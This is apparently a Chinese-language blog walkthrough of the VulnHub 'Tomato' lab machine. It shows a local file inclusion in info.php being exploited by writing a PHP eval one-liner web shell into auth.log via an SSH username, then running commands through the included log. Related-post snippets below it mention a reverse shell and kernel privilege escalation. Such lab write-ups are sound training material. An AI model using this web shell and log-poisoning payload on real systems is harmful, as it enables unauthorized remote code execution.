Tomato靶场通关攻略

于 2024-09-04 14:43:35 发布
阅读量359 收藏
点赞数 13
文章标签: 服务器 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81525518/article/details/141891876
版权

首先安装好后扫描ip找到靶场的ip

进来只有一个图片啥也不能干

找到ip后就可以扫描IP的目录文件了

进去访问就可以看到antibots目录

访问这个目录可以看见有好多文件

进来看见有个info.php进来看看

查看页面源代码发现存在文件包含漏洞

然后就有目标了这里读取etc/passwd

利用ssh连接写入木马 ssh '<?php @eval($_POST[qwe])?>'@192.168.248.133 -p2211

访问一句话木马
命令成功执行,说明一句话写入成功

view-source:172.16.1.113/antibot_image/antibots/info.php?image=/var/log/auth.log&jason=whoami

view-source:172.16.1.113/antibot_image/antibots/info.php?image=/var/log/auth.log&jason=id

然后再用蚁剑成功连接

2301_81525518
关注
  • 13
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶场通关 | Tomato靶机通关秘籍~
鱼溯的博客
10-20 1107
靶场通关 | Tomato靶机通关秘籍~
VulnHub靶场渗透实战-Tomato
随心所欲不逾矩
09-01 1934
特莫特来啦!靶机环境:Vmware网络:NAT模式靶场难度:中一难结果:利用文件包含漏洞提权。
2024年最新靶机实战系列之Tomato靶机,2024年最新神级Golang进阶笔记
2401_84919661的博客
05-12 308
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。(都打包成一块的了,不能一一展开,总共300多集)同样的在日志文件中确实发现了存在相关记录。1.6 反弹shell。
tomato靶机打靶过程及思路
qq_52610024的博客
05-30 447
5.反弹shell成功,开始进行提权,查看到内核版本为16.04可以进行内核版本提权,提权成功拿下root权限,打靶完成。3.发现info.php提示文件包含,读取到/var/log/auth.log,可以用ssh登录传入一句话木马,2.ftp端口没有可利用的方法,路径爆破80端口,发现路径目录antibot_image下有路径。用蚁剑连接,还查看/home/tomato/.ssh/id_rsa没有发现公私钥信息。-i&32>&3);1.常规端口及服务发现。...
vulnhub靶机渗透 Tomato
RestoreJustice的博客
03-19 412
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.137。需要url编码后才能执行,且蚁剑上不能执行,以前类似的环境试过,就python可以。靶机开启了21端口FTP服务、80端口Apache服务、2211端口ssh服务和8888端口nginx服务。尝试登录,被记入日志。使用了第一个,失败了。
靶机实战系列之Tomato靶机,2024年最新oppo鸿蒙面试
2401_84159966的博客
04-18 939
linux-exploit-suggester可以用来枚举内核漏洞。发现漏洞号为45010搜索此漏洞,gcc编译,传到靶机。远程文件包含功能通过info.php发现已经关闭。发现存在ubuntu系统默认写入身份认证文件路径。尝试登录 ssh操作后会写入身份认证日志文件。同样的在日志文件中确实发现了存在相关记录。本地文件包含发现账号tomcat。image参数 存在 文件包含。1.4 源码分析+文件包含。1.6 反弹shell。1.7 内核漏洞枚举。
【每日打靶练习】Vulnhub靶机平台-tomato
leo788的博客
12-30 1503
在网页的下边找到包含内容,通过返回信息中的用户属性得到信息:root用户可以执行shell,下方的tomato用户也可以执行shell,继续。尝试ssh连接,这里使用错误的用户名和错误的密码,输入三次后,写入日志中,检查一下log,成功获取到日志信息,可通过修改ruser来进行注入。刷新日志进行查看,发现注入未显示,证明注入成功,木马被作为代码执行,若显示则失败,代码木马作为文本执行。包含失败,这里未开放远程包含,同时本地包含文件无可再利用—》转换思路。执行后的匹配到相应漏洞,选择可能性高的来试一下。
tomato-靶机渗透测试
m0_54323635的博客
10-09 198
tomato-靶机渗透测试
TOMATO靶机漏洞复现
精品博客,你值得一看~
08-03 253
tomato靶机,漏洞复现,getshell,ssh报错
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
tomato打印服务共享教程
06-01
tomato打印服务共享教程 本教程旨在指导用户如何配置tomato打印服务共享,实现打印机的网络共享。整个过程可以分为五个步骤:配置服务器、启动打印服务功能;有线接入主路由配置;无线连接主路由配置;电脑添加网络...
tomato固件修改工具
06-01
"Tomato固件修改工具"是一款专为网络路由器固件定制和优化的工具,尤其适用于那些使用Tomato固件的设备。Tomato是一款轻量级的开源固件,基于Linux,提供了一系列高级功能,如DDNS(动态域名解析服务)、QoS(服务...
Tomato RAF+ 固件合集
07-06
Tomato RAF+ 可以让普通路由器摇身一变,成为拥有不逊色于商用路由器的功能的路由器, Tomato RAF+ 绝对是你遇到的国内功能最强的Tomato 固件,它是一款适合家用和商用的免费第三方路由器系统。 刷了 Tomato RAF+ 的...
vulnhub靶场-tomato渗透测试
m0_62750315的博客
09-08 1550
小白学渗透
TeamTalk消息服务器(群组相关)
最新发布
COOL_jack的博客
08-31 407
后调用 DB_PROXY::getNormalGroupList 函数。db_proxy_server 收到。
zabbix通过OMSA监控Dell服务器_zabbix dell http
2401_85191700的博客
08-29 166
【代码】zabbix通过OMSA监控Dell服务器_zabbix dell http。
并发服务器
m0_71459026的博客
08-27 426
1.阻塞IO:fgets、scanf、read、recv、getchar。实现步骤:获取原文件描述符的属性->增加非阻塞属性->设置新属性。1.单循环服务器:同一时刻,只能处理一个客户端的任务;2.并发服务器:同一时刻,可以处理多个客户端的任务;:文件描述符,指向要进行操作的打开文件的描述符。(1)异步通知的IO方式,节省CPU;(1)实现多个IO同步的效果。,则它是要设置的值;(1)多个IO复用一个进程;(1)使用轮询的方法实现。(2)只能监测少量IO;(2)cpu占有率低。(2)cpu占有率高。
raksmart机云大宽带服务器托管服务内容
IDC_USA的博客
08-30 453
RakSmart是一家提供全球数据中心服务的公司,其业务范围涵盖了服务器托管、专用服务器租赁、云服务等多个领域。其中,机柜大带宽服务器托管服务是其特色之一,特别适合那些需要大量带宽资源的企业级客户。下面我们将详细介绍RakSmart的机柜大带宽服务器托管服务内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值